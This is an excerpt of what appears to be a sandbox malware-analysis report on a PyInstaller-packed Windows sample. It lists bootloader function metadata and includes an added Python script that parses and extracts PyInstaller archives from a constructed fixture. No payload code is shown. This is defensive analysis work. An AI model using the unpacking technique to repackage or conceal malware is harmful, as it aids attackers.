                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction ID: e2f944a9e83ba7e30b59ec9f2f177da379f5a2a71d054c596229b18e502c4fc3
                                                              • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction Fuzzy Hash: 29C19E36B28A4686EB10CF69C5A06BC3761FB59B98B012225DE6ED77E4EF38D551C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                               • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                               • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                              • String ID: s"5
                                                              • API String ID: 3300690313-1492618520
                                                              • Opcode ID: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
                                                              • Instruction ID: ae25e35669495baca2c61ef3e5ec8f7160a9078362c59fd97b365c0bc655a726
                                                              • Opcode Fuzzy Hash: 0f3ea391c28ca89a74bd740658b8751246de311d9d9a1ab4a8ab4f2b2ce55410
                                                              • Instruction Fuzzy Hash: 1062252272919387E7199E38E91067976E0F748785F059531EAAEC37ECEA3CFA45C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction ID: 51284713ea7a4f52c2f1898fb99e4ccaf49759f3994e392812a3888dd175179d
                                                              • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction Fuzzy Hash: 72F04426A1964386F770CB60B59976A7360AB4C768F041235D97E82AE4EF7CE0598B04

                                                              Control-flow Graph

                                                               • Rendered control-flow graph not preserved in this export: function entry 00007FF6FB1E18F0, blocks marked Executed / Not Executed, internal calls only (no Windows API calls in graph)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock$Message
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 677216364-3497178890
                                                              • Opcode ID: 5b42461e0461bb9a3f2c2c1cb70c0dd9a465cc773c1336ae125719f36c9a405f
                                                              • Instruction ID: 8cd3dbe39fdeabba35f3012ba4dbe3923b299f09861fa7d16d38a881ef22a6a4
                                                              • Opcode Fuzzy Hash: 5b42461e0461bb9a3f2c2c1cb70c0dd9a465cc773c1336ae125719f36c9a405f
                                                              • Instruction Fuzzy Hash: D4718F21E1868785FB20DB24E5542FD23A1EB8CB88F445035E9ADC7BE9FE6CF5548B40

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: edb324d4c3b8625c1d3aace64eba9c8b43f634d022d1992519341acc65c721e8
                                                              • Instruction ID: 84ecfcd80d7305998b3be636ada93a78a111f2fbd3bdddcd1f2a45b457d3d257
                                                              • Opcode Fuzzy Hash: edb324d4c3b8625c1d3aace64eba9c8b43f634d022d1992519341acc65c721e8
                                                              • Instruction Fuzzy Hash: 69414722E0864382FB20DB15A9505BE63A0AF4DBD8F545432DA6E87AF5FE7CF5518700

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2030045667-2813020118
                                                              • Opcode ID: 85026a7eca33eed62396a3c44ac8e2af46aea1793c30bb10ceca8764f980f820
                                                              • Instruction ID: f25522d03216c9f26ca48102f9033c5c81c35bf2f67cc895f3b0f9c312f4e899
                                                              • Opcode Fuzzy Hash: 85026a7eca33eed62396a3c44ac8e2af46aea1793c30bb10ceca8764f980f820
                                                              • Instruction Fuzzy Hash: BB519B62E0868381FB60EA16A8503BE6291BB89798F544135ED6EC7BE5FF3CF551C700
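The string tables of the three bootloader functions above (cookie seek/read and TOC allocation in one, per-entry seek/read in the next, inflateInit()/decompression with zlib 1.3.1 in this one) are the PyInstaller onefile archive reader: the payload Python code of this sample sits in a CArchive appended to the PE, ending in an 88-byte cookie whose magic begins with "MEI". The following is an added example for analysts, not code from the Joe Sandbox report or from PyInstaller itself: it re-implements that reader in Python (locate the cookie from the end of the image, parse it, walk the TOC, inflate a compressed entry) and runs it against a constructed fixture. The struct layouts follow PyInstaller's documented cookie and TOC formats; the fixture's contents (python312.dll, Python version 312, the entry names and script text) are assumptions made up for the demonstration and are not taken from e45AiBoV6X.exe.

```python
"""Parse a PyInstaller CArchive trailer (cookie + TOC) and extract an entry.

Offline reconstruction of the bootloader path the report's strings describe:
seek to cookie, read cookie, read TOC, seek to entry data, read chunk, zlib inflate.
The image parsed at the bottom is a constructed fixture, not bytes from the sample.
"""
import struct
import zlib

# struct _cookie { char magic[8]; uint32 len; uint32 TOC; int TOClen; int pyvers; char pylibname[64]; }
COOKIE_MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FORMAT = "!8sIIii64s"                       # big-endian, 88 bytes
COOKIE_LEN = struct.calcsize(COOKIE_FORMAT)
# struct _toc { int structlen; uint32 pos; uint32 len; uint32 ulen; char cflag; char typcd; char name[]; }
TOC_ENTRY_FORMAT = "!iIIIBB"
TOC_ENTRY_LEN = struct.calcsize(TOC_ENTRY_FORMAT)  # 18 bytes, followed by a NUL-padded name


def find_cookie(image: bytes) -> int:
    """Offset of the cookie magic, searched from the end of the image; -1 if absent."""
    return image.rfind(COOKIE_MAGIC)


def parse_archive(image: bytes) -> dict:
    """Read cookie and TOC; return package start, Python version, pylib name and entry list."""
    cookie_off = find_cookie(image)
    if cookie_off < 0 or cookie_off + COOKIE_LEN > len(image):
        raise ValueError("no PyInstaller cookie found")
    _magic, pkg_len, toc_pos, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FORMAT, image[cookie_off:cookie_off + COOKIE_LEN])
    # The package is the pkg_len bytes that end with the cookie; TOC and entry
    # positions are relative to its start, not to the start of the PE.
    pkg_start = cookie_off + COOKIE_LEN - pkg_len
    if pkg_start < 0 or pkg_start + toc_pos + toc_len > cookie_off:
        raise ValueError("cookie describes a TOC outside the image")
    toc = image[pkg_start + toc_pos:pkg_start + toc_pos + toc_len]
    entries, off = [], 0
    while off + TOC_ENTRY_LEN <= len(toc):
        entry_len, pos, clen, ulen, cflag, typcd = struct.unpack_from(TOC_ENTRY_FORMAT, toc, off)
        if entry_len < TOC_ENTRY_LEN or off + entry_len > len(toc):
            raise ValueError(f"corrupt TOC entry at offset {off}")
        name = toc[off + TOC_ENTRY_LEN:off + entry_len].rstrip(b"\0").decode("utf-8")
        entries.append({"name": name, "type": chr(typcd), "compressed": bool(cflag),
                        "pos": pos, "len": clen, "ulen": ulen})
        off += entry_len
    return {"pkg_start": pkg_start, "pyvers": pyvers,
            "pylibname": pylib.rstrip(b"\0").decode("ascii"), "entries": entries}


def extract_entry(image: bytes, archive: dict, name: str) -> bytes:
    """Return the uncompressed bytes of a TOC entry, inflating zlib-compressed ones."""
    entry = next(e for e in archive["entries"] if e["name"] == name)
    start = archive["pkg_start"] + entry["pos"]
    raw = image[start:start + entry["len"]]
    data = zlib.decompress(raw) if entry["compressed"] else raw
    if len(data) != entry["ulen"]:
        raise ValueError(f"{name}: expected {entry['ulen']} bytes, got {len(data)}")
    return data


def build_fixture(entries, prefix: bytes = b"MZ" + b"\0" * 62) -> bytes:
    """Constructed image: opaque PE-like prefix, entry data, TOC, cookie (test data, not a real sample)."""
    body, toc = bytearray(), bytearray()
    for name, typcd, payload, compress in entries:
        data = zlib.compress(payload) if compress else payload
        pos = len(body)
        body += data
        name_b = name.encode("utf-8") + b"\0"
        entry_len = TOC_ENTRY_LEN + len(name_b)
        entry_len += (-entry_len) % 16                 # TOC entries are padded to a multiple of 16
        toc += struct.pack(TOC_ENTRY_FORMAT, entry_len, pos, len(data), len(payload),
                           int(compress), ord(typcd))
        toc += name_b.ljust(entry_len - TOC_ENTRY_LEN, b"\0")
    toc_pos = len(body)
    pkg_len = len(body) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FORMAT, COOKIE_MAGIC, pkg_len, toc_pos, len(toc), 312,
                         b"python312.dll".ljust(64, b"\0"))   # assumed version/pylib for the fixture
    return prefix + bytes(body) + bytes(toc) + cookie


# Constructed sample: a runtime option (type 'o', no data; the option text is the entry name,
# as with the pyi-contents-directory string in the report) and one zlib-compressed script entry.
SAMPLE_IMAGE = build_fixture([
    ("pyi-contents-directory _internal", "o", b"", False),
    ("main", "s", b"import os\nprint('constructed script entry')\n", True),
])

if __name__ == "__main__":
    arc = parse_archive(SAMPLE_IMAGE)
    print(f"pyvers={arc['pyvers']} pylib={arc['pylibname']} package@{arc['pkg_start']:#x}")
    for e in arc["entries"]:
        print(f"{e['type']} {'z' if e['compressed'] else '-'} {e['ulen']:>6} {e['name']}")
    print(extract_entry(SAMPLE_IMAGE, arc, "main").decode())
```

To apply this to a real onefile binary, read the PE with `open(path, "rb").read()` and pass it to parse_archive(); script entries (type 's') and the PYZ archive (type 'z') are where a grabber's Python code lives, and the 's' entries are marshalled code objects or plain source depending on the PyInstaller version, so the byte output here is only the first step. The bounds checks on pkg_start and entry_len matter on real samples: a truncated or re-packed file is exactly where the bootloader's own "Could not read full TOC!" path fires.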

                                                              Control-flow Graph

                                                               • Rendered control-flow graph not preserved in this export: function entry 00007FF6FB1FAD6C, blocks marked Executed / Not Executed, API calls in graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
                                                              • Instruction ID: f5e055fceffc53f5b794d61c64e7a08555c6d169ef99cdab7ceb5876c17f195e
                                                              • Opcode Fuzzy Hash: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
                                                              • Instruction Fuzzy Hash: 85C1F226E1C68791EB61DB15A4403BE37A1FB98B88F550131DA6E877F1EE7CE855C300

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6FB1E3534), ref: 00007FF6FB1E3411
                                                                • Part of subcall function 00007FF6FB1E29E0: GetLastError.KERNEL32(?,?,?,00007FF6FB1E342E,?,00007FF6FB1E3534), ref: 00007FF6FB1E2A14
                                                                • Part of subcall function 00007FF6FB1E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6FB1E342E), ref: 00007FF6FB1E2A7D
                                                                • Part of subcall function 00007FF6FB1E29E0: MessageBoxW.USER32 ref: 00007FF6FB1E2ACF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorFileFormatLastModuleName
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 517058245-2863816727

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                              • API String ID: 1452528299-2209325370
                                                              APIs
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9ED6
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9EE0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
• RtlAllocateHeap.NTDLL(?,?,?,00007FF6FB1EFFB0,?,?,?,00007FF6FB1F161A,?,?,?,?,?,00007FF6FB1F2E09), ref: 00007FF6FB1FC94A
Memory Dump Source
• Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
  • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
• LoadLibraryW.KERNEL32(?,00007FF6FB1E5C06,?,00007FF6FB1E308E), ref: 00007FF6FB1E81C2
Memory Dump Source
• Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
Similarity
• API ID: EnvironmentVariable$ByteCharMultiWide
• String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
• API String ID: 2184640988-1666712896
APIs
Memory Dump Source
• Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaee0000_e45AiBoV6X.jbxd
Similarity
• API ID: 00007E126ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 2506844470-0
APIs
• FindFirstFileW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A1B
• RemoveDirectoryW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A9E
• DeleteFileW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ABD
• FindNextFileW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ACB
• FindClose.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ADC
• RemoveDirectoryW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7AE5
Strings
Memory Dump Source
• Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
APIs
Memory Dump Source
• Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
Similarity
• API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
• String ID:
• API String ID: 1171239525-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
Similarity
